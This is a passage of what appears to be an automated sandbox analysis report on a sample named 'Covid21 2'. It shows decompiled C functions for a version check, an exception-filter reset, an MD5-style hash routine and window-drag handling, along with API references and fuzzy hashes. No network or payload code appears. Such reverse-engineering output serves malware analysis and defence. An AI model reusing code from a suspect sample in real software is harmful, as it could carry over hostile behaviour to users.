                                  • SizeofResource.KERNEL32(?,00000000,?,00000000,00000000,00000000,004013B1,OPS,00000000,00000000), ref: 00402110
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Resource$FindLoadSizeof
                                  • String ID:
                                  • API String ID: 507330600-0
                                  • Opcode ID: aa1a8b08b7dc22c46b1c861aeba25619853496701750f453b4bb729b9282f012
                                  • Instruction ID: ee1045747f34407a6d6bc23282b484ecb6b20e6a617ab4d886f8bfa51eb75997
                                  • Opcode Fuzzy Hash: aa1a8b08b7dc22c46b1c861aeba25619853496701750f453b4bb729b9282f012
                                  • Instruction Fuzzy Hash: 05F0B770508301EFC705AF20DE05A1EBAE5FB98B05F008C3EB5886A1A1D7359D24EB4A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E00403CD7() {
                                  				void* _t17;
                                  				void* _t20;
                                  				void* _t21;
                                  				void* _t22;
                                  				intOrPtr _t24;
                                  				void* _t25;
                                  				void* _t31;
                                  				void* _t36;
                                  				void* _t38;
                                  
                                  				_t36 = _t38 - 0x78;
                                  				_t31 = 0x64;
                                  				 *(_t36 - 0x1c) = 0x94;
                                  				if(GetVersionExA(_t36 - 0x1c) != 0) {
                                  					_t17 =  *((intOrPtr*)(_t36 - 0xc)) - 1;
                                  					if(_t17 == 0) {
                                  						if( *((intOrPtr*)(_t36 - 0x14)) == 0) {
                                  							_push(0xa);
                                  							goto L24;
                                  						} else {
                                  							if( *((intOrPtr*)(_t36 - 0x14)) == 0xa) {
                                  								_push(0x1e);
                                  								goto L24;
                                  							} else {
                                  								if( *((intOrPtr*)(_t36 - 0x14)) == 0x5a) {
                                  									_push(0x28);
                                  									goto L24;
                                  								}
                                  							}
                                  						}
                                  					} else {
                                  						if(_t17 == 1) {
                                  							_t20 =  *((intOrPtr*)(_t36 - 0x18)) - 3;
                                  							if(_t20 == 0) {
                                  								_push(5);
                                  								goto L24;
                                  							} else {
                                  								_t21 = _t20 - 1;
                                  								if(_t21 == 0) {
                                  									_push(0x14);
                                  									goto L24;
                                  								} else {
                                  									_t22 = _t21 - 1;
                                  									if(_t22 == 0) {
                                  										_t24 =  *((intOrPtr*)(_t36 - 0x14));
                                  										if(_t24 == 0) {
                                  											_push(0x32);
                                  											goto L24;
                                  										} else {
                                  											_t25 = _t24 - 1;
                                  											if(_t25 == 0) {
                                  												_push(0x3c);
                                  												goto L24;
                                  											} else {
                                  												if(_t25 == 1) {
                                  													_push(0x41);
                                  													goto L24;
                                  												}
                                  											}
                                  										}
                                  									} else {
                                  										if(_t22 == 1) {
                                  											_t31 = 0x46;
                                  											 *(_t36 - 0xb8) = 0x9c;
                                  											if(GetVersionExA(_t36 - 0xb8) != 0 &&  *((char*)(_t36 - 0x1e)) != 1) {
                                  												_push(0x4b);
                                  												L24:
                                  												_pop(_t31);
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t31;
                                  			}













                                  APIs
                                  • GetVersionExA.KERNEL32(?), ref: 00403CF8
                                  • GetVersionExA.KERNEL32(?), ref: 00403D2C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Version
                                  • String ID:
                                  • API String ID: 1889659487-0
                                  • Opcode ID: ba98cba157ab3b960229647d21839f567787df23c3c7d879bd2f0e37a5dce517
                                  • Instruction ID: 8f98cf7366f8b09a5e2b92140d047ce8a00d89b420ca6a4debb2036adb0e8e2a
                                  • Opcode Fuzzy Hash: ba98cba157ab3b960229647d21839f567787df23c3c7d879bd2f0e37a5dce517
                                  • Instruction Fuzzy Hash: 1E117231644A0A95EF309E689845FAF7EACAF10747F140037A201B53D4E67C8B46C66F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403CC0() {
                                  				_Unknown_base(*)()* _t1;
                                  				_Unknown_base(*)()* _t2;
                                  
                                  				_t1 =  *0x40b218; // 0x0
                                  				_t2 = SetUnhandledExceptionFilter(_t1);
                                  				 *0x40b218 = 0;
                                  				return _t2;
                                  			}






                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,00401BDA,00401BC0,00000001,00000010,OPS,00000000,00000000,00000000), ref: 00403CC6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: e0e7740ab41f41c427503136dfe7f7d29bd2fdb7ab83b42a702d68ec8da14e00
                                  • Instruction ID: cd7c64c5dc77f132242c3daac67179aa2c9d7864a58c2e899d60234b9b4753e9
                                  • Opcode Fuzzy Hash: e0e7740ab41f41c427503136dfe7f7d29bd2fdb7ab83b42a702d68ec8da14e00
                                  • Instruction Fuzzy Hash: 64B092740402008BCB008B90EE8C74836A4E398214F8009A8A000A6230C33880808BCD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 48%
                                  			E00406C10(void* __ecx, intOrPtr* _a4) {
                                  				intOrPtr _v4;
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				intOrPtr _v40;
                                  				intOrPtr _v44;
                                  				intOrPtr _v48;
                                  				intOrPtr _v52;
                                  				intOrPtr _v56;
                                  				intOrPtr _v60;
                                  				char _v64;
                                  				signed int _v68;
                                  				intOrPtr* _t209;
                                  				signed int _t212;
                                  				signed int _t214;
                                  				signed int _t216;
                                  				signed int _t218;
                                  				signed int _t220;
                                  				signed int _t222;
                                  				signed int _t224;
                                  				signed int _t226;
                                  				signed int _t228;
                                  				signed int _t230;
                                  				signed int _t232;
                                  				signed int _t234;
                                  				signed int _t236;
                                  				signed int _t238;
                                  				signed int _t240;
                                  				signed int _t242;
                                  				intOrPtr _t253;
                                  				signed int _t254;
                                  				signed int _t289;
                                  				signed int _t326;
                                  				void* _t338;
                                  				signed int _t339;
                                  				signed int _t341;
                                  				signed int _t343;
                                  				signed int _t345;
                                  				signed int _t347;
                                  				signed int _t349;
                                  				signed int _t351;
                                  				signed int _t353;
                                  				signed int _t355;
                                  				signed int _t364;
                                  				signed int _t366;
                                  				signed int _t368;
                                  				signed int _t370;
                                  				signed int _t372;
                                  				signed int _t374;
                                  				signed int _t376;
                                  				signed int _t384;
                                  				signed int _t386;
                                  				signed int _t388;
                                  				signed int _t390;
                                  				signed int _t392;
                                  				signed int _t394;
                                  				signed int _t396;
                                  				signed int _t398;
                                  				signed int _t400;
                                  				signed int _t402;
                                  				signed int _t404;
                                  				signed int _t406;
                                  				signed int _t414;
                                  				signed int _t416;
                                  				signed int _t418;
                                  				signed int _t420;
                                  				signed int _t422;
                                  				void* _t423;
                                  				signed int _t495;
                                  				signed int _t582;
                                  				signed int _t588;
                                  				signed int _t600;
                                  				intOrPtr* _t680;
                                  				char* _t681;
                                  				signed int _t682;
                                  				signed int _t684;
                                  				signed int _t686;
                                  				signed int _t688;
                                  				signed int _t690;
                                  				signed int _t692;
                                  				signed int _t694;
                                  				signed int _t696;
                                  				signed int _t698;
                                  				signed int _t704;
                                  				signed int _t706;
                                  				signed int _t712;
                                  				signed int _t714;
                                  				signed int _t716;
                                  				signed int _t718;
                                  				signed int _t720;
                                  				intOrPtr _t725;
                                  
                                  				_t209 = _a4;
                                  				_t338 = __ecx + 2;
                                  				_t681 =  &_v64;
                                  				_t423 = 0x10;
                                  				do {
                                  					_t254 =  *(_t338 - 1) & 0x000000ff;
                                  					_t681 = _t681 + 4;
                                  					_t338 = _t338 + 4;
                                  					_t423 = _t423 - 1;
                                  					 *(_t681 - 4) = (0 << 0x00000008 | _t254) << 0x00000008 |  *(_t338 - 6) & 0x000000ff;
                                  				} while (_t423 != 0);
                                  				_t682 =  *(_t209 + 4);
                                  				_t384 =  *(_t209 + 8);
                                  				_t339 =  *(_t209 + 0xc);
                                  				asm("rol eax, 0x7");
                                  				_t212 = ( !_t682 & _t339 | _t384 & _t682) + _v64 +  *_t209 - 0x28955b88 + _t682;
                                  				asm("rol ecx, 0xc");
                                  				_t341 = ( !_t212 & _t384 | _t682 & _t212) + _v60 + _t339 - 0x173848aa + _t212;
                                  				asm("ror edx, 0xf");
                                  				_t386 = ( !_t341 & _t682 | _t341 & _t212) + _v56 + _t384 + 0x242070db + _t341;
                                  				asm("ror esi, 0xa");
                                  				_t684 = ( !_t386 & _t212 | _t341 & _t386) + _v52 + _t682 - 0x3e423112 + _t386;
                                  				asm("rol eax, 0x7");
                                  				_t214 = ( !_t684 & _t341 | _t386 & _t684) + _v48 + _t212 - 0xa83f051 + _t684;
                                  				asm("rol ecx, 0xc");
                                  				_t343 = ( !_t214 & _t386 | _t684 & _t214) + _v44 + _t341 + 0x4787c62a + _t214;
                                  				asm("ror edx, 0xf");
                                  				_t388 = ( !_t343 & _t684 | _t343 & _t214) + _v40 + _t386 - 0x57cfb9ed + _t343;
                                  				asm("ror esi, 0xa");
                                  				_t686 = ( !_t388 & _t214 | _t343 & _t388) + _v36 + _t684 - 0x2b96aff + _t388;
                                  				asm("rol eax, 0x7");
                                  				_t216 = ( !_t686 & _t343 | _t388 & _t686) + _v32 + _t214 + 0x698098d8 + _t686;
                                  				asm("rol ecx, 0xc");
                                  				_t345 = ( !_t216 & _t388 | _t686 & _t216) + _v28 + _t343 - 0x74bb0851 + _t216;
                                  				asm("ror edx, 0xf");
                                  				_t390 = ( !_t345 & _t686 | _t345 & _t216) + _v24 + _t388 - 0xa44f + _t345;
                                  				asm("ror esi, 0xa");
                                  				_t688 = ( !_t390 & _t216 | _t345 & _t390) + _v20 + _t686 - 0x76a32842 + _t390;
                                  				asm("rol eax, 0x7");
                                  				_t218 = ( !_t688 & _t345 | _t390 & _t688) + _v16 + _t216 + 0x6b901122 + _t688;
                                  				asm("rol ecx, 0xc");
                                  				_t347 = ( !_t218 & _t390 | _t688 & _t218) + _v12 + _t345 - 0x2678e6d + _t218;
                                  				_t495 =  !_t347;
                                  				asm("ror edx, 0xf");
                                  				_t392 = (_t495 & _t688 | _t347 & _t218) + _v8 + _t390 - 0x5986bc72 + _t347;
                                  				_t289 =  !_t392;
                                  				_v68 = _t289;
                                  				_t725 = _v4;
                                  				asm("ror esi, 0xa");
                                  				_t690 = (_t289 & _t218 | _t347 & _t392) + _t725 + _t688 + 0x49b40821 + _t392;
                                  				asm("rol eax, 0x5");
                                  				_t220 = (_t495 & _t392 | _t347 & _t690) + _v60 + _t218 - 0x9e1da9e + _t690;
                                  				asm("rol ecx, 0x9");
                                  				_t349 = (_v68 & _t690 | _t392 & _t220) + _v40 + _t347 - 0x3fbf4cc0 + _t220;
                                  				asm("rol edx, 0xe");
                                  				_t394 = ( !_t690 & _t220 | _t349 & _t690) + _v20 + _t392 + 0x265e5a51 + _t349;
                                  				asm("ror esi, 0xc");
                                  				_t692 = ( !_t220 & _t349 | _t394 & _t220) + _v64 + _t690 - 0x16493856 + _t394;
                                  				asm("rol eax, 0x5");
                                  				_t222 = ( !_t349 & _t394 | _t349 & _t692) + _v44 + _t220 - 0x29d0efa3 + _t692;
                                  				asm("rol ecx, 0x9");
                                  				_t351 = ( !_t394 & _t692 | _t394 & _t222) + _v24 + _t349 + 0x2441453 + _t222;
                                  				asm("rol edx, 0xe");
                                  				_t396 = ( !_t692 & _t222 | _t351 & _t692) + _t725 + _t394 - 0x275e197f + _t351;
                                  				asm("ror esi, 0xc");
                                  				_t694 = ( !_t222 & _t351 | _t396 & _t222) + _v48 + _t692 - 0x182c0438 + _t396;
                                  				asm("rol eax, 0x5");
                                  				_t224 = ( !_t351 & _t396 | _t351 & _t694) + _v28 + _t222 + 0x21e1cde6 + _t694;
                                  				asm("rol ecx, 0x9");
                                  				_t353 = ( !_t396 & _t694 | _t396 & _t224) + _v8 + _t351 - 0x3cc8f82a + _t224;
                                  				asm("rol edx, 0xe");
                                  				_t398 = ( !_t694 & _t224 | _t353 & _t694) + _v52 + _t396 - 0xb2af279 + _t353;
                                  				asm("ror esi, 0xc");
                                  				_t696 = ( !_t224 & _t353 | _t398 & _t224) + _v32 + _t694 + 0x455a14ed + _t398;
                                  				asm("rol eax, 0x5");
                                  				_t226 = ( !_t353 & _t398 | _t353 & _t696) + _v12 + _t224 - 0x561c16fb + _t696;
                                  				asm("rol ecx, 0x9");
                                  				_t355 = ( !_t398 & _t696 | _t398 & _t226) + _v56 + _t353 - 0x3105c08 + _t226;
                                  				asm("rol edx, 0xe");
                                  				_t400 = ( !_t696 & _t226 | _t355 & _t696) + _v36 + _t398 + 0x676f02d9 + _t355;
                                  				asm("ror esi, 0xc");
                                  				_t698 = ( !_t226 & _t355 | _t400 & _t226) + _v16 + _t696 - 0x72d5b376 + _t400;
                                  				asm("rol eax, 0x4");
                                  				_t228 = (_t355 ^ _t400 ^ _t698) + _v44 + _t226 - 0x5c6be + _t698;
                                  				asm("rol edi, 0xb");
                                  				_t582 = (_t400 ^ _t698 ^ _t228) + _v32 + _t355 - 0x788e097f + _t228;
                                  				asm("rol edx, 0x10");
                                  				_t402 = (_t582 ^ _t698 ^ _t228) + _v20 + _t400 + 0x6d9d6122 + _t582;
                                  				_t326 = _t582 ^ _t402;
                                  				asm("ror ecx, 0x9");
                                  				_t364 = (_t326 ^ _t228) + _v8 + _t698 - 0x21ac7f4 + _t402;
                                  				asm("rol eax, 0x4");
                                  				_t230 = (_t326 ^ _t364) + _v60 + _t228 - 0x5b4115bc + _t364;
                                  				asm("rol esi, 0xb");
                                  				_t704 = (_t402 ^ _t364 ^ _t230) + _v48 + _t582 + 0x4bdecfa9 + _t230;
                                  				asm("rol edx, 0x10");
                                  				_t404 = (_t704 ^ _t364 ^ _t230) + _v36 + _t402 - 0x944b4a0 + _t704;
                                  				_t588 = _t704 ^ _t404;
                                  				asm("ror ecx, 0x9");
                                  				_t366 = (_t588 ^ _t230) + _v24 + _t364 - 0x41404390 + _t404;
                                  				asm("rol eax, 0x4");
                                  				_t232 = (_t588 ^ _t366) + _v12 + _t230 + 0x289b7ec6 + _t366;
                                  				asm("rol esi, 0xb");
                                  				_t706 = (_t404 ^ _t366 ^ _t232) + _v64 + _t704 - 0x155ed806 + _t232;
                                  				asm("rol edi, 0x10");
                                  				_t600 = (_t706 ^ _t366 ^ _t232) + _v52 + _t404 - 0x2b10cf7b + _t706;
                                  				_t406 = _t706 ^ _t600;
                                  				asm("ror ecx, 0x9");
                                  				_t368 = (_t406 ^ _t232) + _v40 + _t366 + 0x4881d05 + _t600;
                                  				asm("rol eax, 0x4");
                                  				_t234 = (_t406 ^ _t368) + _v28 + _t232 - 0x262b2fc7 + _t368;
                                  				asm("rol edx, 0xb");
                                  				_t414 = (_t600 ^ _t368 ^ _t234) + _v16 + _t706 - 0x1924661b + _t234;
                                  				asm("rol esi, 0x10");
                                  				_t712 = (_t414 ^ _t368 ^ _t234) + _t725 + _t600 + 0x1fa27cf8 + _t414;
                                  				asm("ror ecx, 0x9");
                                  				_t370 = (_t414 ^ _t712 ^ _t234) + _v56 + _t368 - 0x3b53a99b + _t712;
                                  				asm("rol eax, 0x6");
                                  				_t236 = (( !_t414 | _t370) ^ _t712) + _v64 + _t234 - 0xbd6ddbc + _t370;
                                  				asm("rol edx, 0xa");
                                  				_t416 = (( !_t712 | _t236) ^ _t370) + _v36 + _t414 + 0x432aff97 + _t236;
                                  				asm("rol esi, 0xf");
                                  				_t714 = (( !_t370 | _t416) ^ _t236) + _v8 + _t712 - 0x546bdc59 + _t416;
                                  				asm("ror ecx, 0xb");
                                  				_t372 = (( !_t236 | _t714) ^ _t416) + _v44 + _t370 - 0x36c5fc7 + _t714;
                                  				asm("rol eax, 0x6");
                                  				_t238 = (( !_t416 | _t372) ^ _t714) + _v16 + _t236 + 0x655b59c3 + _t372;
                                  				asm("rol edx, 0xa");
                                  				_t418 = (( !_t714 | _t238) ^ _t372) + _v52 + _t416 - 0x70f3336e + _t238;
                                  				asm("rol esi, 0xf");
                                  				_t716 = (( !_t372 | _t418) ^ _t238) + _v24 + _t714 - 0x100b83 + _t418;
                                  				asm("ror ecx, 0xb");
                                  				_t374 = (( !_t238 | _t716) ^ _t418) + _v60 + _t372 - 0x7a7ba22f + _t716;
                                  				asm("rol eax, 0x6");
                                  				_t240 = (( !_t418 | _t374) ^ _t716) + _v32 + _t238 + 0x6fa87e4f + _t374;
                                  				asm("rol edx, 0xa");
                                  				_t420 = (( !_t716 | _t240) ^ _t374) + _t725 + _t418 - 0x1d31920 + _t240;
                                  				asm("rol esi, 0xf");
                                  				_t718 = (( !_t374 | _t420) ^ _t240) + _v40 + _t716 - 0x5cfebcec + _t420;
                                  				asm("ror ecx, 0xb");
                                  				_t376 = (( !_t240 | _t718) ^ _t420) + _v12 + _t374 + 0x4e0811a1 + _t718;
                                  				asm("rol eax, 0x6");
                                  				_t242 = (( !_t420 | _t376) ^ _t718) + _v48 + _t240 - 0x8ac817e + _t376;
                                  				asm("rol edx, 0xa");
                                  				_t422 = (( !_t718 | _t242) ^ _t376) + _v20 + _t420 - 0x42c50dcb + _t242;
                                  				_t680 = _a4;
                                  				asm("rol esi, 0xf");
                                  				_t720 = (( !_t376 | _t422) ^ _t242) + _v56 + _t718 + 0x2ad7d2bb + _t422;
                                  				 *_t680 =  *_t680 + _t242;
                                  				asm("ror eax, 0xb");
                                  				 *((intOrPtr*)(_t680 + 4)) = (( !_t242 | _t720) ^ _t422) + _v28 + _t376 - 0x14792c6f +  *((intOrPtr*)(_t680 + 4)) + _t720;
                                  				 *((intOrPtr*)(_t680 + 8)) =  *((intOrPtr*)(_t680 + 8)) + _t720;
                                  				_t253 =  *((intOrPtr*)(_t680 + 0xc)) + _t422;
                                  				 *((intOrPtr*)(_t680 + 0xc)) = _t253;
                                  				return _t253;
                                  			}

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1d082fc67961cf9c9017bdebd9d0fdabf83cbc1f99fd689fd60a11460bf935a
                                  • Instruction ID: 7102d13b211e639c190c95f68438129d24ba1901ff3681f10da7641a22d18450
                                  • Opcode Fuzzy Hash: a1d082fc67961cf9c9017bdebd9d0fdabf83cbc1f99fd689fd60a11460bf935a
                                  • Instruction Fuzzy Hash: 7A12D3BBA557124BD708CA55CC80295B3E3BBC8364B1F913DD959D3305EEB9BA0B46C0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 66%
                                  			E0040523F(struct HWND__* _a4, intOrPtr _a8, signed int _a12, unsigned int _a16) {
                                  				struct HINSTANCE__* _v8;
                                  				void _v12;
                                  				struct tagPOINT _v20;
                                  				intOrPtr _t104;
                                  				void* _t110;
                                  				void* _t111;
                                  				void* _t112;
                                  				int _t115;
                                  				void* _t122;
                                  				void* _t123;
                                  				void* _t126;
                                  				int _t129;
                                  				void* _t130;
                                  				int _t134;
                                  				unsigned int _t141;
                                  				int _t175;
                                  				void* _t181;
                                  				int _t182;
                                  				int _t190;
                                  				int* _t196;
                                  				void* _t199;
                                  				signed int _t201;
                                  
                                  				_t196 = E0040642D( *0x40b3f4);
                                  				_v8 = 0xd0d0d0d1;
                                  				if( *_t196 != 0) {
                                  					_t104 = _a8;
                                  					if(_t104 != 0x200) {
                                  						if(_t104 != 0x100) {
                                  							if(_t104 == 0x202) {
                                  								L60:
                                  								ReleaseCapture();
                                  								L65:
                                  								_v8 = 0;
                                  								L66:
                                  								return _v8;
                                  							}
                                  							if(_t104 != 0x215) {
                                  								goto L66;
                                  							}
                                  							PostMessageA(_a4, 0x232, 0, 0);
                                  							 *_t196 = 0;
                                  							if(_t196[1] != 0) {
                                  								SetCursorPos(_t196[2], _t196[3]);
                                  							}
                                  							goto L65;
                                  						}
                                  						_t110 = _a12 - 0xd;
                                  						if(_t110 == 0) {
                                  							goto L60;
                                  						}
                                  						_t111 = _t110 - 0xe;
                                  						if(_t111 == 0) {
                                  							goto L60;
                                  						}
                                  						_t199 = 0xa;
                                  						_t112 = _t111 - _t199;
                                  						if(_t112 == 0) {
                                  							GetCursorPos( &_v20);
                                  							_t115 = _t196[0xc];
                                  							if(_t115 != 0) {
                                  								if(_t115 != 3) {
                                  									if(_t115 != 6) {
                                  										_v20.x = _v20.x - _t199;
                                  										L58:
                                  										E004051F1(_t196, _a4, _v20.x, _v20.y);
                                  										L59:
                                  										goto L66;
                                  									}
                                  									_push(_t196[7]);
                                  									L32:
                                  									_push(_t196[4].left);
                                  									_t196[0xc] = 7;
                                  									L33:
                                  									_push(0x7f83);
                                  									L34:
                                  									E00405093();
                                  									goto L59;
                                  								}
                                  								_t122 = 2;
                                  								L49:
                                  								_push(_t196[5] + _t122);
                                  								_t196[0xc] = 4;
                                  								_t181 = _t196[4].left + _t122;
                                  								L29:
                                  								_push(_t181);
                                  								_push(0x7f82);
                                  								goto L34;
                                  							}
                                  							_t196[0xc] = 1;
                                  							_push(_v20.y);
                                  							_push(_t196[4]);
                                  							L38:
                                  							_push(0x7f84);
                                  							goto L34;
                                  						}
                                  						_t123 = _t112 - 1;
                                  						if(_t123 == 0) {
                                  							GetCursorPos( &_v20);
                                  							_t182 = _t196[0xc];
                                  							if(_t182 != 0) {
                                  								_t122 = 2;
                                  								if(_t182 != _t122) {
                                  									if(_t182 != 1) {
                                  										_v20.y = _v20.y - _t199;
                                  										goto L58;
                                  									}
                                  									goto L49;
                                  								}
                                  								_push(_t196[5]);
                                  								_t196[0xc] = 5;
                                  								_push(_t196[6] - _t122);
                                  								goto L33;
                                  							}
                                  							_push(_t196[5]);
                                  							_t196[0xc] = 3;
                                  							L26:
                                  							_push(_v20.x);
                                  							_push(0x7f85);
                                  							goto L34;
                                  						}
                                  						_t126 = _t123 - 1;
                                  						if(_t126 == 0) {
                                  							GetCursorPos( &_v20);
                                  							_t129 = _t196[0xc];
                                  							if(_t129 != 0) {
                                  								if(_t129 != 3) {
                                  									if(_t129 != 6) {
                                  										_v20.x = _v20.x + _t199;
                                  										goto L58;
                                  									}
                                  									_t130 = 2;
                                  									L28:
                                  									_push(_t196[7] - _t130);
                                  									_t196[0xc] = 8;
                                  									_t181 = _t196[6] - _t130;
                                  									goto L29;
                                  								}
                                  								_push(_t196[5]);
                                  								_t196[0xc] = 5;
                                  								_push(_t196[6]);
                                  								goto L33;
                                  							}
                                  							_t134 = 2;
                                  							_t196[0xc] = _t134;
                                  							_push(_v20.y);
                                  							_push(_t196[6] - _t134);
                                  							goto L38;
                                  						}
                                  						if(_t126 != 1) {
                                  							goto L66;
                                  						}
                                  						GetCursorPos( &_v20);
                                  						_t190 = _t196[0xc];
                                  						if(_t190 != 0) {
                                  							_t130 = 2;
                                  							if(_t190 != _t130) {
                                  								if(_t190 != 1) {
                                  									_v20.y = _v20.y + _t199;
                                  									goto L58;
                                  								}
                                  								_push(_t196[7] - _t130);
                                  								goto L32;
                                  							}
                                  							goto L28;
                                  						}
                                  						_t196[0xc] = 6;
                                  						_push(_t196[7]);
                                  						goto L26;
                                  					}
                                  					_t141 = _a16;
                                  					_t196[1] = 0;
                                  					_v20.y = _t141 >> 0x10;
                                  					_v20.x = _t141;
                                  					MapWindowPoints(_a4, 0,  &_v20, 1);
                                  					E004050C1(_t196, _v20.x, _v20.y);
                                  					_t46 =  &(_t196[4]); // 0x10
                                  					SendMessageA(_a4, 0x214, _t196[0xc], _t46);
                                  					_push(_a4);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					E004051A3();
                                  					goto L65;
                                  				}
                                  				if(_a8 != 0x112) {
                                  					goto L66;
                                  				}
                                  				_t201 = _a12;
                                  				if((_t201 & 0x0000fff0) != 0xf000) {
                                  					goto L66;
                                  				}
                                  				SystemParametersInfoA(0x26, 0,  &_v12, 0);
                                  				if(_v12 == 0) {
                                  					goto L66;
                                  				}
                                  				_t6 =  &(_t196[4]); // 0x10
                                  				_t196[0xc] = _t201 & 0x0000000f;
                                  				 *_t196 = 1;
                                  				GetWindowRect(_a4, _t6);
                                  				_t9 =  &(_t196[8]); // 0x20
                                  				GetWindowRect(_a4, _t9);
                                  				_t196[0xd] = 0;
                                  				_t196[0xe] = 0;
                                  				_t196[0xf] = GetSystemMetrics(0x3d);
                                  				_t196[0x10] = GetSystemMetrics(0x3e);
                                  				if((GetWindowLongA(_a4, 0xfffffff0) & 0x00800000) == 0) {
                                  					if((GetWindowLongA(_a4, 0xffffffec) & 0x00000100) == 0) {
                                  						_t196[0x11] = 0;
                                  						_t196[0x12] = 0;
                                  						goto L10;
                                  					}
                                  					_t175 = GetSystemMetrics(0x2d);
                                  					_push(0x2e);
                                  					goto L8;
                                  				} else {
                                  					_t175 = GetSystemMetrics(5);
                                  					_push(6);
                                  					L8:
                                  					_t196[0x11] = _t175;
                                  					_t196[0x12] = GetSystemMetrics(??);
                                  					L10:
                                  					_t196[0x13] = GetSystemMetrics(0x22);
                                  					_t196[0x14] = GetSystemMetrics(0x23);
                                  					_t196[0x15] = GetSystemMetrics(0x3b);
                                  					_t196[0x16] = GetSystemMetrics(0x3c);
                                  					_t29 =  &(_t196[0xd]); // 0x34
                                  					SendMessageA(_a4, 0x24, 0, _t29);
                                  					if(GetKeyState(1) == 0) {
                                  						SendMessageA(_a4, 0x201, 1, 0);
                                  					}
                                  					SetCapture(_a4);
                                  					PostMessageA(_a4, 0x231, 0, 0);
                                  					if(_t196[0xc] != 0) {
                                  						_t196[1] = 0;
                                  					} else {
                                  						_t196[1] = 1;
                                  						GetCursorPos( &(_t196[2]));
                                  						SetCursor(LoadImageA(0, 0x7f86, 2, 0, 0, 0x8040));
                                  					}
                                  					goto L65;
                                  				}
                                  			}


























                                  APIs
                                  • SystemParametersInfoA.USER32(00000026,00000000,?,00000000), ref: 00405290
                                  • GetWindowRect.USER32(?,00000010), ref: 004052B8
                                  • GetWindowRect.USER32(?,00000020), ref: 004052C1
                                  • GetSystemMetrics.USER32(0000003D), ref: 004052D1
                                  • GetSystemMetrics.USER32(0000003E), ref: 004052D8
                                  • GetWindowLongA.USER32(?,000000F0), ref: 004052E2
                                  • GetSystemMetrics.USER32(00000005), ref: 004052F1
                                  • GetWindowLongA.USER32(?,000000EC), ref: 004052FC
                                  • GetSystemMetrics.USER32(0000002D), ref: 0040530A
                                  • GetSystemMetrics.USER32(0000002E), ref: 00405311
                                  • GetSystemMetrics.USER32(00000022), ref: 00405320
                                  • GetSystemMetrics.USER32(00000023), ref: 00405327
                                  • GetSystemMetrics.USER32(0000003B), ref: 0040532E
                                  • GetSystemMetrics.USER32(0000003C), ref: 00405335
                                  • SendMessageA.USER32(?,00000024,00000000,00000034), ref: 0040534A
                                  • GetKeyState.USER32(00000001), ref: 0040534E
                                  • SendMessageA.USER32(?,00000201,00000001,00000000), ref: 00405364
                                  • SetCapture.USER32(?), ref: 00405369
